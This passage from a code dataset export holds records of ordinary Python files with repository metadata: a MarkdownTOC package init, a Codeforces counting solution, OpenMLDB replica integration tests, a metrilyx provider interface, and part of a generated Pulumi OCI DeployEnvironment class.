| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ffd0aa56c237765008ae556daed22a3979dad59b
| 174
|
py
|
Python
|
__init__.py
|
TheSecEng/MarkdownTOC
|
7c69137249820dc586fd90b58fca2f34c54f2abc
|
[
"MIT"
] | 299
|
2015-01-16T23:58:12.000Z
|
2022-03-12T03:26:17.000Z
|
__init__.py
|
naokazuterada/MarkdownTOC
|
b61546d001661d9385423556a62c21c36abc6857
|
[
"MIT"
] | 137
|
2015-01-14T22:43:21.000Z
|
2021-05-25T10:27:12.000Z
|
__init__.py
|
TheSecEng/MarkdownTOC
|
7c69137249820dc586fd90b58fca2f34c54f2abc
|
[
"MIT"
] | 77
|
2015-01-23T17:51:36.000Z
|
2022-03-16T02:19:38.000Z
|
from .markdowntoc.autorunner import AutoRunner
from .markdowntoc.markdowntoc_insert import MarkdowntocInsert
from .markdowntoc.markdowntoc_update import MarkdowntocUpdate
| 43.5
| 62
| 0.87931
| 17
| 174
| 8.882353
| 0.470588
| 0.298013
| 0.344371
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086207
| 174
| 3
| 63
| 58
| 0.949686
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f29e73f99181e06dc8f978880b3e4b5f44424ccc
| 68
|
py
|
Python
|
Codeforces/G_Challenge_Pennants.py
|
anubhab-code/Competitive-Programming
|
de28cb7d44044b9e7d8bdb475da61e37c018ac35
|
[
"MIT"
] | null | null | null |
Codeforces/G_Challenge_Pennants.py
|
anubhab-code/Competitive-Programming
|
de28cb7d44044b9e7d8bdb475da61e37c018ac35
|
[
"MIT"
] | null | null | null |
Codeforces/G_Challenge_Pennants.py
|
anubhab-code/Competitive-Programming
|
de28cb7d44044b9e7d8bdb475da61e37c018ac35
|
[
"MIT"
] | null | null | null |
n = int(input())
# Pennants of each kind are identical, so count multisets: C(n+4, 5) placements
# for the 5 pennants times C(n+2, 3) for the 3 pennants; 720 = 5! * 3!.
print((n*(n+1)*(n+2)*(n+3)*(n+4)*n*(n+1)*(n+2))//720)
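# Sanity-check sketch (illustrative, not part of the submission; needs
# Python 3.8+ for math.comb). The product above is exactly
# C(n+4, 5) * C(n+2, 3) * 720, so the integer division is exact.
from math import comb
assert (n*(n+1)*(n+2)*(n+3)*(n+4)*n*(n+1)*(n+2)) // 720 == comb(n + 4, 5) * comb(n + 2, 3)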
| 34
| 53
| 0.455882
| 19
| 68
| 1.631579
| 0.473684
| 0.129032
| 0.193548
| 0.258065
| 0.322581
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134328
| 0.014706
| 68
| 2
| 53
| 34
| 0.328358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
f2b6a4cdfe5711eefdb890f0cf1dcc416da4dbf3
| 10,600
|
py
|
Python
|
test-common/integrationtest/testcase/test_addreplica.py
|
lotabout/OpenMLDB
|
432da3afbed240eb0b8d0571c05f233b1a5a1cd4
|
[
"Apache-2.0"
] | 2,659
|
2021-06-07T12:59:15.000Z
|
2022-03-30T15:29:37.000Z
|
test-common/integrationtest/testcase/test_addreplica.py
|
wei20024/OpenMLDB
|
16b426bcba18f70e083179f82db51e71e65d1bf6
|
[
"Apache-2.0"
] | 1,396
|
2021-05-28T09:50:13.000Z
|
2022-03-31T16:37:49.000Z
|
test-common/integrationtest/testcase/test_addreplica.py
|
wei20024/OpenMLDB
|
16b426bcba18f70e083179f82db51e71e65d1bf6
|
[
"Apache-2.0"
] | 499
|
2021-05-31T07:36:48.000Z
|
2022-03-31T15:10:12.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2021 4Paradigm
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
from testcasebase import TestCaseBase
import time
from libs.test_loader import load
from libs.deco import multi_dimension
import libs.ddt as ddt
@ddt.ddt
class TestAddReplica(TestCaseBase):
@multi_dimension(False)
def test_addreplica_leader_add(self):
"""
        Leader addreplica of slaves succeeds.
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
self.put(self.leader,
self.tid,
self.pid,
'k1',
self.now() - 1,
'v1')
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs2)
rs3 = self.create(self.slave2, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs3)
rs4 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs4)
rs5 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave2)
self.assertIn('AddReplica ok', rs5)
table_status1 = self.get_table_status(self.slave1, self.tid, self.pid)
self.assertEqual(table_status1[:6], ['1', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
table_status2 = self.get_table_status(self.slave2, self.tid, self.pid)
self.assertEqual(table_status2[:6], ['1', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
self.put(self.leader,
self.tid,
self.pid,
'k2',
self.now() - 1,
'v2')
time.sleep(1)
self.assertIn('v1', self.scan(self.slave1, self.tid, self.pid, 'k1', self.now(), 1))
self.assertIn('v2', self.scan(self.slave1, self.tid, self.pid, 'k2', self.now(), 1))
self.assertIn('v1', self.scan(self.slave2, self.tid, self.pid, 'k1', self.now(), 1))
self.assertIn('v2', self.scan(self.slave2, self.tid, self.pid, 'k2', self.now(), 1))
@multi_dimension(True)
def test_addreplica_leader_add_md(self):
"""
        Leader addreplica of slaves succeeds (multi-dimension variant).
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
rs = self.put(self.leader,
self.tid,
self.pid,
'',
self.now() - 1,
'v1','1.1','k1')
self.assertIn('Put ok', rs)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs2)
rs3 = self.create(self.slave2, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs3)
rs4 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs4)
rs5 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave2)
self.assertIn('AddReplica ok', rs5)
table_status1 = self.get_table_status(self.slave1, self.tid, self.pid)
self.assertEqual(table_status1[:6], ['1', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
table_status2 = self.get_table_status(self.slave2, self.tid, self.pid)
self.assertEqual(table_status2[:6], ['1', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
self.put(self.leader,
self.tid,
self.pid,
'',
self.now() - 1,
'v2', '1.1','k2')
time.sleep(1)
self.assertIn('v1', self.scan(self.slave1, self.tid, self.pid, {'card':'k1'}, self.now(), 1))
self.assertIn('v2', self.scan(self.slave1, self.tid, self.pid, {'card':'k2'}, self.now(), 1))
self.assertIn('v1', self.scan(self.slave2, self.tid, self.pid, {'card':'k1'}, self.now(), 1))
self.assertIn('v2', self.scan(self.slave2, self.tid, self.pid, {'card':'k2'}, self.now(), 1))
def test_addreplica_change_to_normal(self):
"""
        After the leader addreplica, the table state returns to normal.
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs2)
rs3 = self.pausesnapshot(self.slave1, self.tid, self.pid)
self.assertIn('PauseSnapshot ok', rs3)
rs4 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs4)
table_status = self.get_table_status(self.leader, self.tid, self.pid)
self.assertEqual(table_status[:6], ['0', 'kTableLeader', 'kTableNormal', 'true', '144000min', '0s'])
def test_addreplica_slave_cannot_add(self):
"""
        addreplica is not allowed on a follower node.
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs1)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs2)
rs3 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('Fail to Add Replica', rs3)
@multi_dimension(False)
def test_delreplica_slave_cannot_scan(self):
"""
        After the leader deletes a replica, newly put data cannot be scanned from that slave.
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true')
self.assertIn('Create table ok', rs1)
self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.create(self.slave2, 't', self.tid, self.pid, 144000, 8, 'false')
rs = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs)
rs = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave2)
self.assertIn('AddReplica ok', rs)
self.put(self.leader,
self.tid,
self.pid,
'k1',
self.now() - 1,
'v1')
time.sleep(1)
rs2 = self.delreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('DelReplica ok', rs2)
self.put(self.leader,
self.tid,
self.pid,
'k2',
self.now() - 1,
'v2')
time.sleep(1)
self.assertIn('v1', self.scan(self.slave1, self.tid, self.pid, 'k1', self.now(), 1))
        self.assertNotIn('v2', self.scan(self.slave1, self.tid, self.pid, 'k2', self.now(), 1))
self.assertIn('v1', self.scan(self.slave2, self.tid, self.pid, 'k1', self.now(), 1))
self.assertIn('v2', self.scan(self.slave2, self.tid, self.pid, 'k2', self.now(), 1))
@multi_dimension(True)
def test_delreplica_slave_cannot_scan_md(self):
"""
        After the leader deletes a replica, newly put data cannot be scanned from that slave (multi-dimension variant).
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.create(self.slave2, 't', self.tid, self.pid, 144000, 8, 'false')
rs2 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs2)
rs2 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave2)
self.assertIn('AddReplica ok', rs2)
self.put(self.leader,
self.tid,
self.pid,
'',
self.now() - 1,
'v1', '1.1', 'k1')
time.sleep(1)
self.assertIn('v1', self.scan(self.slave2, self.tid, self.pid, {'card':'k1'}, self.now(), 1))
rs3 = self.delreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('DelReplica ok', rs3)
self.put(self.leader,
self.tid,
self.pid,
'',
self.now() - 1,
'v2', '1.1', 'k2')
time.sleep(1)
        self.assertIn('v1', self.scan(self.slave1, self.tid, self.pid, {'card':'k1'}, self.now(), 1))
        self.assertNotIn('v2', self.scan(self.slave1, self.tid, self.pid, {'card':'k2'}, self.now(), 1))
        self.assertIn('v1', self.scan(self.slave2, self.tid, self.pid, {'card':'k1'}, self.now(), 1))
        self.assertIn('v2', self.scan(self.slave2, self.tid, self.pid, {'card':'k2'}, self.now(), 1))
@multi_dimension(True)
@ddt.data(
({'k2': ('string:index', 'testvalue1'),
'k3': ('double', 1.1)}),
({'k0': ('string:index', 1.1),
'k2': ('string:index', 'testvalue1'),
'k3': ('double', 1.1)}),
({'k1': ('double:index', 1.1),
'k2': ('string:index', 'testvalue1'),
'k3': ('double', 1.1)}),
({'k1': ('string', 1.1),
'k2': ('string:index', 'testvalue1'),
'k3': ('double', 1.1)}),
)
def test_addreplica_fail_schema_mismatch(self, slave_schema): # RTIDB-166
"""
        When adding a replica of a multi-dimensional table whose schema does not match the leader table's, the add fails.
:return:
"""
self.multidimension_vk = {'k1': ('string:index', 'testvalue0'),
'k2': ('string:index', 'testvalue1'),
'k3': ('double', 1.1)}
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
self.multidimension_vk = slave_schema
self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
rs2 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs2)
if __name__ == "__main__":
load(TestAddReplica)
| 43.621399
| 111
| 0.566321
| 1,343
| 10,600
| 4.419955
| 0.123604
| 0.073113
| 0.114892
| 0.146226
| 0.813342
| 0.795991
| 0.78504
| 0.769879
| 0.75876
| 0.751685
| 0
| 0.048843
| 0.266038
| 10,600
| 242
| 112
| 43.801653
| 0.714139
| 0.081604
| 0
| 0.715084
| 0
| 0
| 0.119566
| 0
| 0
| 0
| 0
| 0
| 0.27933
| 1
| 0.039106
| false
| 0
| 0.027933
| 0
| 0.072626
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4b4c70b33a40e74947b1d3a02473b56961605b04
| 247
|
py
|
Python
|
metrilyx/schema/provider/interface.py
|
metrilyx/metrilyx-dataserver
|
12a1663a4845a5e216097e8bba59429d53341857
|
[
"Apache-2.0"
] | 1
|
2016-12-16T09:14:56.000Z
|
2016-12-16T09:14:56.000Z
|
metrilyx/schema/provider/interface.py
|
metrilyx/metrilyx-dataserver
|
12a1663a4845a5e216097e8bba59429d53341857
|
[
"Apache-2.0"
] | null | null | null |
metrilyx/schema/provider/interface.py
|
metrilyx/metrilyx-dataserver
|
12a1663a4845a5e216097e8bba59429d53341857
|
[
"Apache-2.0"
] | null | null | null |
class IProvider(object):
def normalizedAlias(self, metaStr, aliasStr):
raise NotImplementedError("Subclass must implement this method!")
def aggr(self):
raise NotImplementedError("Subclass must implement this method!")
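# A minimal concrete provider sketch (hypothetical, not part of metrilyx),
# showing how a subclass would satisfy the IProvider interface above:
class EchoProvider(IProvider):
    def normalizedAlias(self, metaStr, aliasStr):
        # Trivial normalization: hand back the alias unchanged.
        return aliasStr
    def aggr(self):
        # Placeholder aggregator name; a real provider maps to its backend.
        return "sum"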
| 24.7
| 73
| 0.720648
| 25
| 247
| 7.12
| 0.64
| 0.269663
| 0.359551
| 0.404494
| 0.617978
| 0.617978
| 0.617978
| 0
| 0
| 0
| 0
| 0
| 0.194332
| 247
| 9
| 74
| 27.444444
| 0.894472
| 0
| 0
| 0.4
| 0
| 0
| 0.293878
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
4b6445d706c9692e3f575e73372d0f26de797b1b
| 39,812
|
py
|
Python
|
sdk/python/pulumi_oci/devops/deploy_environment.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/devops/deploy_environment.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/devops/deploy_environment.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DeployEnvironmentArgs', 'DeployEnvironment']
@pulumi.input_type
class DeployEnvironmentArgs:
def __init__(__self__, *,
deploy_environment_type: pulumi.Input[str],
project_id: pulumi.Input[str],
cluster_id: Optional[pulumi.Input[str]] = None,
compute_instance_group_selectors: Optional[pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs']] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DeployEnvironment resource.
:param pulumi.Input[str] deploy_environment_type: (Updatable) Deployment environment type.
:param pulumi.Input[str] project_id: The OCID of a project.
:param pulumi.Input[str] cluster_id: (Updatable) The OCID of the Kubernetes cluster.
:param pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs'] compute_instance_group_selectors: (Updatable) A collection of selectors. The combination of instances matching the selectors are included in the instance group.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment environment.
:param pulumi.Input[str] display_name: (Updatable) Deployment environment display name. Avoid entering confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_id: (Updatable) The OCID of the Function.
"""
pulumi.set(__self__, "deploy_environment_type", deploy_environment_type)
pulumi.set(__self__, "project_id", project_id)
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if compute_instance_group_selectors is not None:
pulumi.set(__self__, "compute_instance_group_selectors", compute_instance_group_selectors)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if function_id is not None:
pulumi.set(__self__, "function_id", function_id)
@property
@pulumi.getter(name="deployEnvironmentType")
def deploy_environment_type(self) -> pulumi.Input[str]:
"""
(Updatable) Deployment environment type.
"""
return pulumi.get(self, "deploy_environment_type")
@deploy_environment_type.setter
def deploy_environment_type(self, value: pulumi.Input[str]):
pulumi.set(self, "deploy_environment_type", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
The OCID of a project.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the Kubernetes cluster.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="computeInstanceGroupSelectors")
def compute_instance_group_selectors(self) -> Optional[pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]:
"""
(Updatable) A collection of selectors. The combination of instances matching the selectors are included in the instance group.
"""
return pulumi.get(self, "compute_instance_group_selectors")
@compute_instance_group_selectors.setter
def compute_instance_group_selectors(self, value: Optional[pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]):
pulumi.set(self, "compute_instance_group_selectors", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Optional description about the deployment environment.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Deployment environment display name. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="functionId")
def function_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the Function.
"""
return pulumi.get(self, "function_id")
@function_id.setter
def function_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "function_id", value)
@pulumi.input_type
class _DeployEnvironmentState:
def __init__(__self__, *,
cluster_id: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
compute_instance_group_selectors: Optional[pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs']] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_environment_type: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_id: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering DeployEnvironment resources.
:param pulumi.Input[str] cluster_id: (Updatable) The OCID of the Kubernetes cluster.
:param pulumi.Input[str] compartment_id: The OCID of a compartment.
:param pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs'] compute_instance_group_selectors: (Updatable) A collection of selectors. The combination of instances matching the selectors are included in the instance group.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deploy_environment_type: (Updatable) Deployment environment type.
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment environment.
:param pulumi.Input[str] display_name: (Updatable) Deployment environment display name. Avoid entering confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_id: (Updatable) The OCID of the Function.
:param pulumi.Input[str] lifecycle_details: A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
:param pulumi.Input[str] project_id: The OCID of a project.
:param pulumi.Input[str] state: The current state of the deployment environment.
:param pulumi.Input[Mapping[str, Any]] system_tags: Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
:param pulumi.Input[str] time_created: Time the deployment environment was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
:param pulumi.Input[str] time_updated: Time the deployment environment was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if compute_instance_group_selectors is not None:
pulumi.set(__self__, "compute_instance_group_selectors", compute_instance_group_selectors)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if deploy_environment_type is not None:
pulumi.set(__self__, "deploy_environment_type", deploy_environment_type)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if function_id is not None:
pulumi.set(__self__, "function_id", function_id)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if state is not None:
pulumi.set(__self__, "state", state)
if system_tags is not None:
pulumi.set(__self__, "system_tags", system_tags)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_updated is not None:
pulumi.set(__self__, "time_updated", time_updated)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the Kubernetes cluster.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of a compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="computeInstanceGroupSelectors")
def compute_instance_group_selectors(self) -> Optional[pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]:
"""
        (Updatable) A collection of selectors. The combination of instances matching the selectors is included in the instance group.
"""
return pulumi.get(self, "compute_instance_group_selectors")
@compute_instance_group_selectors.setter
def compute_instance_group_selectors(self, value: Optional[pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]):
pulumi.set(self, "compute_instance_group_selectors", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="deployEnvironmentType")
def deploy_environment_type(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Deployment environment type.
"""
return pulumi.get(self, "deploy_environment_type")
@deploy_environment_type.setter
def deploy_environment_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deploy_environment_type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Optional description about the deployment environment.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Deployment environment display name. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
